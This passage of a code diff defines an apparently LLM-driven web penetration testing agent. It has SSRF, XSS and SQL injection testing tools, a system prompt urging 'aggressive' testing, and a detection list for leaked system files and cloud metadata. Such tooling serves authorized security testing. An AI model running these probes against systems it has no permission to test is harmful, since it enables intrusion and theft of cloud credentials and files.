+
test_url = f"{url}?{param}={payload}"
|
|
480
|
+
response = await client.get(test_url, timeout=10.0)
|
|
481
|
+
|
|
482
|
+
# Check for SSRF indicators
|
|
483
|
+
ssrf_indicators = [
|
|
484
|
+
"root:", "uid=", "passwd", "shadow", # File read
|
|
485
|
+
"ami-id", "instance-id", "hostname", # AWS
|
|
486
|
+
"computeMetadata", "project-id", # GCP
|
|
487
|
+
"vmId", "subscriptionId", # Azure
|
|
488
|
+
"connection refused", "no route to host" # Network errors suggesting internal access
|
|
489
|
+
]
|
|
490
|
+
|
|
491
|
+
indicator_found = any(ind in response.text.lower() for ind in ssrf_indicators)
|
|
492
|
+
|
|
493
|
+
results.append({
|
|
494
|
+
"payload": payload,
|
|
495
|
+
"description": description,
|
|
496
|
+
"status": response.status_code,
|
|
497
|
+
"length": len(response.text),
|
|
498
|
+
"indicator": indicator_found,
|
|
499
|
+
"preview": response.text[:200] if indicator_found else ""
|
|
500
|
+
})
|
|
501
|
+
|
|
502
|
+
await asyncio.sleep(0.2)
|
|
503
|
+
|
|
504
|
+
except Exception as e:
|
|
505
|
+
# Timeouts or connection errors might indicate internal network access
|
|
506
|
+
error_msg = str(e).lower()
|
|
507
|
+
internal_indicators = ["timeout", "connection refused", "no route", "unreachable"]
|
|
508
|
+
possible_ssrf = any(ind in error_msg for ind in internal_indicators)
|
|
509
|
+
|
|
510
|
+
results.append({
|
|
511
|
+
"payload": payload,
|
|
512
|
+
"description": description,
|
|
513
|
+
"error": str(e),
|
|
514
|
+
"possible_ssrf": possible_ssrf
|
|
515
|
+
})
|
|
516
|
+
|
|
517
|
+
# Format results
|
|
518
|
+
vulnerable = [r for r in results if r.get("indicator") or r.get("possible_ssrf")]
|
|
519
|
+
|
|
520
|
+
output = f"""SSRF Testing: {url}
|
|
521
|
+
Parameter: {param}
|
|
522
|
+
|
|
523
|
+
"""
|
|
524
|
+
if vulnerable:
|
|
525
|
+
output += "🚨 POTENTIAL SSRF DETECTED!\n\n"
|
|
526
|
+
output += "=== INDICATORS ===\n"
|
|
527
|
+
for r in vulnerable:
|
|
528
|
+
if r.get("indicator"):
|
|
529
|
+
output += f" {r['description']}: Response contains internal data\n"
|
|
530
|
+
output += f" Preview: {r.get('preview', '')}\n"
|
|
531
|
+
if r.get("possible_ssrf"):
|
|
532
|
+
output += f" {r['description']}: Network error suggests internal access attempt\n"
|
|
533
|
+
|
|
534
|
+
output += "\n=== ALL RESULTS ===\n"
|
|
535
|
+
for r in results:
|
|
536
|
+
if "error" in r:
|
|
537
|
+
status = "Possible SSRF" if r.get("possible_ssrf") else "Error"
|
|
538
|
+
output += f" {r['description']}: {status}\n"
|
|
539
|
+
else:
|
|
540
|
+
status = "INDICATOR FOUND" if r.get("indicator") else f"Status {r['status']}"
|
|
541
|
+
output += f" {r['description']}: {status}\n"
|
|
542
|
+
|
|
543
|
+
return output
|
|
544
|
+
|
|
545
|
+
except Exception as e:
|
|
546
|
+
return f"SSRF testing failed: {str(e)}"
|
|
547
|
+
|
|
548
|
+
|
|
549
|
+
@register_tool(
|
|
550
|
+
name="report_web_finding",
|
|
551
|
+
description="Report a web security vulnerability",
|
|
552
|
+
parameters={
|
|
553
|
+
"title": {"type": "string"},
|
|
554
|
+
"severity": {"type": "string"},
|
|
555
|
+
"vuln_type": {"type": "string"},
|
|
556
|
+
"url": {"type": "string"},
|
|
557
|
+
"description": {"type": "string"},
|
|
558
|
+
"payload": {"type": "string"},
|
|
559
|
+
"evidence": {"type": "string"},
|
|
560
|
+
"remediation": {"type": "string"},
|
|
561
|
+
"cwe": {"type": "string"}
|
|
562
|
+
},
|
|
563
|
+
category="web_pentest"
|
|
564
|
+
)
|
|
565
|
+
async def report_web_finding(
|
|
566
|
+
title: str,
|
|
567
|
+
severity: str,
|
|
568
|
+
vuln_type: str,
|
|
569
|
+
url: str,
|
|
570
|
+
description: str,
|
|
571
|
+
payload: str,
|
|
572
|
+
evidence: str,
|
|
573
|
+
remediation: str,
|
|
574
|
+
cwe: Optional[str] = None
|
|
575
|
+
) -> str:
|
|
576
|
+
"""Report a web security finding."""
|
|
577
|
+
return f"""Web Security Finding Recorded:
|
|
578
|
+
Title: {title}
|
|
579
|
+
Severity: {severity}
|
|
580
|
+
Type: {vuln_type}
|
|
581
|
+
URL: {url}
|
|
582
|
+
CWE: {cwe or 'N/A'}
|
|
583
|
+
Description: {description}
|
|
584
|
+
Payload: {payload}
|
|
585
|
+
Evidence: {evidence[:500]}
|
|
586
|
+
Remediation: {remediation}
|
|
587
|
+
"""
|
|
588
|
+
|
|
589
|
+
|
|
590
|
+
WEB_PENTEST_SYSTEM_PROMPT = """You are an expert web application penetration tester with deep knowledge of:
|
|
591
|
+
- OWASP Top 10 vulnerabilities
|
|
592
|
+
- Client-side security (XSS, CSRF, Clickjacking)
|
|
593
|
+
- Server-side security (SQLi, RCE, SSRF, XXE)
|
|
594
|
+
- Authentication and session management
|
|
595
|
+
- Business logic flaws
|
|
596
|
+
|
|
597
|
+
## TESTING METHODOLOGY
|
|
598
|
+
|
|
599
|
+
### Phase 1: Reconnaissance
|
|
600
|
+
- Spider the target to discover all pages and endpoints
|
|
601
|
+
- Identify forms, inputs, and parameters
|
|
602
|
+
- Analyze security headers
|
|
603
|
+
- Check robots.txt, sitemap.xml
|
|
604
|
+
|
|
605
|
+
### Phase 2: Input Vector Testing
|
|
606
|
+
For each input discovered:
|
|
607
|
+
1. Test for XSS (reflected, stored, DOM)
|
|
608
|
+
2. Test for SQL injection
|
|
609
|
+
3. Test for command injection
|
|
610
|
+
4. Test for path traversal
|
|
611
|
+
|
|
612
|
+
### Phase 3: Authentication & Session
|
|
613
|
+
- Test for weak credentials
|
|
614
|
+
- Check session token randomness
|
|
615
|
+
- Test session fixation
|
|
616
|
+
- Test logout functionality
|
|
617
|
+
|
|
618
|
+
### Phase 4: Authorization
|
|
619
|
+
- Test for IDOR
|
|
620
|
+
- Check horizontal privilege escalation
|
|
621
|
+
- Check vertical privilege escalation
|
|
622
|
+
|
|
623
|
+
### Phase 5: Business Logic
|
|
624
|
+
- Test workflow bypasses
|
|
625
|
+
- Check for race conditions
|
|
626
|
+
- Test input validation on client vs server
|
|
627
|
+
|
|
628
|
+
## VULNERABILITY PRIORITIES
|
|
629
|
+
|
|
630
|
+
1. **CRITICAL**: RCE, SQLi with data extraction, Auth bypass
|
|
631
|
+
2. **HIGH**: Stored XSS, SSRF, Path traversal with file read
|
|
632
|
+
3. **MEDIUM**: Reflected XSS, CSRF, Info disclosure
|
|
633
|
+
4. **LOW**: Missing security headers, clickjacking
|
|
634
|
+
|
|
635
|
+
## OUTPUT FORMAT
|
|
636
|
+
|
|
637
|
+
Use report_web_finding for each vulnerability with:
|
|
638
|
+
- Clear, specific title
|
|
639
|
+
- Accurate severity
|
|
640
|
+
- Working payload
|
|
641
|
+
- Evidence (request/response)
|
|
642
|
+
- Specific remediation
|
|
643
|
+
|
|
644
|
+
Be thorough and aggressive. Test ALL inputs. Check ALL pages."""
|
|
645
|
+
|
|
646
|
+
|
|
647
|
+
class WebPentestAgent(BaseSecurityAgent):
|
|
648
|
+
"""
|
|
649
|
+
AI-powered web application penetration testing agent.
|
|
650
|
+
|
|
651
|
+
Performs comprehensive web security testing including:
|
|
652
|
+
- Site spidering and reconnaissance
|
|
653
|
+
- Injection testing (XSS, SQLi, SSRF, etc.)
|
|
654
|
+
- Authentication and authorization testing
|
|
655
|
+
- Security header analysis
|
|
656
|
+
|
|
657
|
+
Usage:
|
|
658
|
+
agent = WebPentestAgent(target="https://example.com")
|
|
659
|
+
result = await agent.run()
|
|
660
|
+
"""
|
|
661
|
+
|
|
662
|
+
def __init__(
|
|
663
|
+
self,
|
|
664
|
+
target: str,
|
|
665
|
+
config: Optional[AgentConfig] = None,
|
|
666
|
+
cookies: Optional[Dict[str, str]] = None,
|
|
667
|
+
auth_token: Optional[str] = None,
|
|
668
|
+
scope: Optional[List[str]] = None
|
|
669
|
+
):
|
|
670
|
+
"""
|
|
671
|
+
Initialize the web pentest agent.
|
|
672
|
+
|
|
673
|
+
Args:
|
|
674
|
+
target: Target URL to test
|
|
675
|
+
config: Agent configuration
|
|
676
|
+
cookies: Session cookies for authenticated testing
|
|
677
|
+
auth_token: Bearer token for API authentication
|
|
678
|
+
scope: List of URL patterns that are in scope
|
|
679
|
+
"""
|
|
680
|
+
super().__init__(config)
|
|
681
|
+
self.target = target.rstrip('/')
|
|
682
|
+
self.cookies = cookies or {}
|
|
683
|
+
self.auth_token = auth_token
|
|
684
|
+
self.scope = scope or [urlparse(target).netloc]
|
|
685
|
+
|
|
686
|
+
def get_system_prompt(self) -> str:
|
|
687
|
+
"""Get the web pentest system prompt."""
|
|
688
|
+
prompt = WEB_PENTEST_SYSTEM_PROMPT
|
|
689
|
+
|
|
690
|
+
if self.scope:
|
|
691
|
+
prompt += f"\n\n## SCOPE\nOnly test these domains: {', '.join(self.scope)}"
|
|
692
|
+
|
|
693
|
+
return prompt
|
|
694
|
+
|
|
695
|
+
def get_tools(self) -> List[Dict[str, Any]]:
|
|
696
|
+
"""Get tools available for web pentesting."""
|
|
697
|
+
return [
|
|
698
|
+
{
|
|
699
|
+
"name": "fetch_page",
|
|
700
|
+
"description": "Fetch a web page and analyze its content",
|
|
701
|
+
"parameters": {
|
|
702
|
+
"url": {"type": "string", "description": "URL to fetch"},
|
|
703
|
+
"headers": {"type": "object", "description": "Optional headers"},
|
|
704
|
+
"method": {"type": "string", "description": "HTTP method"}
|
|
705
|
+
},
|
|
706
|
+
"required": ["url"]
|
|
707
|
+
},
|
|
708
|
+
{
|
|
709
|
+
"name": "spider_site",
|
|
710
|
+
"description": "Spider a website to discover pages and endpoints",
|
|
711
|
+
"parameters": {
|
|
712
|
+
"start_url": {"type": "string"},
|
|
713
|
+
"max_pages": {"type": "integer"},
|
|
714
|
+
"same_domain": {"type": "boolean"}
|
|
715
|
+
},
|
|
716
|
+
"required": ["start_url"]
|
|
717
|
+
},
|
|
718
|
+
{
|
|
719
|
+
"name": "test_xss",
|
|
720
|
+
"description": "Test for XSS vulnerabilities",
|
|
721
|
+
"parameters": {
|
|
722
|
+
"url": {"type": "string"},
|
|
723
|
+
"param": {"type": "string"},
|
|
724
|
+
"method": {"type": "string"}
|
|
725
|
+
},
|
|
726
|
+
"required": ["url", "param"]
|
|
727
|
+
},
|
|
728
|
+
{
|
|
729
|
+
"name": "test_sqli",
|
|
730
|
+
"description": "Test for SQL injection",
|
|
731
|
+
"parameters": {
|
|
732
|
+
"url": {"type": "string"},
|
|
733
|
+
"param": {"type": "string"},
|
|
734
|
+
"method": {"type": "string"}
|
|
735
|
+
},
|
|
736
|
+
"required": ["url", "param"]
|
|
737
|
+
},
|
|
738
|
+
{
|
|
739
|
+
"name": "test_ssrf",
|
|
740
|
+
"description": "Test for SSRF vulnerabilities",
|
|
741
|
+
"parameters": {
|
|
742
|
+
"url": {"type": "string"},
|
|
743
|
+
"param": {"type": "string"},
|
|
744
|
+
"callback_url": {"type": "string"}
|
|
745
|
+
},
|
|
746
|
+
"required": ["url", "param"]
|
|
747
|
+
},
|
|
748
|
+
{
|
|
749
|
+
"name": "report_web_finding",
|
|
750
|
+
"description": "Report a web security vulnerability",
|
|
751
|
+
"parameters": {
|
|
752
|
+
"title": {"type": "string"},
|
|
753
|
+
"severity": {"type": "string"},
|
|
754
|
+
"vuln_type": {"type": "string"},
|
|
755
|
+
"url": {"type": "string"},
|
|
756
|
+
"description": {"type": "string"},
|
|
757
|
+
"payload": {"type": "string"},
|
|
758
|
+
"evidence": {"type": "string"},
|
|
759
|
+
"remediation": {"type": "string"},
|
|
760
|
+
"cwe": {"type": "string"}
|
|
761
|
+
},
|
|
762
|
+
"required": ["title", "severity", "vuln_type", "url", "description", "payload", "evidence", "remediation"]
|
|
763
|
+
}
|
|
764
|
+
]
|
|
765
|
+
|
|
766
|
+
async def run(self, initial_message: Optional[str] = None) -> AgentResult:
|
|
767
|
+
"""
|
|
768
|
+
Run the web penetration test.
|
|
769
|
+
|
|
770
|
+
Args:
|
|
771
|
+
initial_message: Optional additional instructions
|
|
772
|
+
|
|
773
|
+
Returns:
|
|
774
|
+
AgentResult with all security findings
|
|
775
|
+
"""
|
|
776
|
+
message = f"""Perform comprehensive web application penetration testing on: {self.target}
|
|
777
|
+
|
|
778
|
+
Testing Process:
|
|
779
|
+
1. First, fetch the main page to analyze the application
|
|
780
|
+
2. Spider the site to discover all pages and parameters
|
|
781
|
+
3. Test each parameter for XSS vulnerabilities
|
|
782
|
+
4. Test each parameter for SQL injection
|
|
783
|
+
5. Test URL parameters for SSRF
|
|
784
|
+
6. Analyze security headers
|
|
785
|
+
7. Report all findings
|
|
786
|
+
|
|
787
|
+
{f'Use cookies for authenticated testing: {json.dumps(self.cookies)}' if self.cookies else ''}
|
|
788
|
+
{f'Use auth token: {self.auth_token}' if self.auth_token else ''}
|
|
789
|
+
|
|
790
|
+
{initial_message or ''}
|
|
791
|
+
|
|
792
|
+
Begin testing now. Be thorough and test ALL discovered inputs."""
|
|
793
|
+
|
|
794
|
+
return await super().run(message)
|
|
795
|
+
|
|
796
|
+
async def quick_scan(self) -> AgentResult:
|
|
797
|
+
"""
|
|
798
|
+
Perform a quick security scan.
|
|
799
|
+
|
|
800
|
+
Returns:
|
|
801
|
+
AgentResult with high-priority findings
|
|
802
|
+
"""
|
|
803
|
+
original_max_steps = self.config.max_steps
|
|
804
|
+
self.config.max_steps = min(25, original_max_steps)
|
|
805
|
+
|
|
806
|
+
try:
|
|
807
|
+
message = f"""Perform a QUICK security scan of: {self.target}
|
|
808
|
+
|
|
809
|
+
Focus on high-priority vulnerabilities only:
|
|
810
|
+
1. Fetch the main page and check security headers
|
|
811
|
+
2. Test 2-3 most important parameters for XSS and SQLi
|
|
812
|
+
3. Check for obvious misconfigurations
|
|
813
|
+
|
|
814
|
+
Do not spider the entire site. Focus on finding critical issues fast."""
|
|
815
|
+
|
|
816
|
+
return await super().run(message)
|
|
817
|
+
finally:
|
|
818
|
+
self.config.max_steps = original_max_steps
|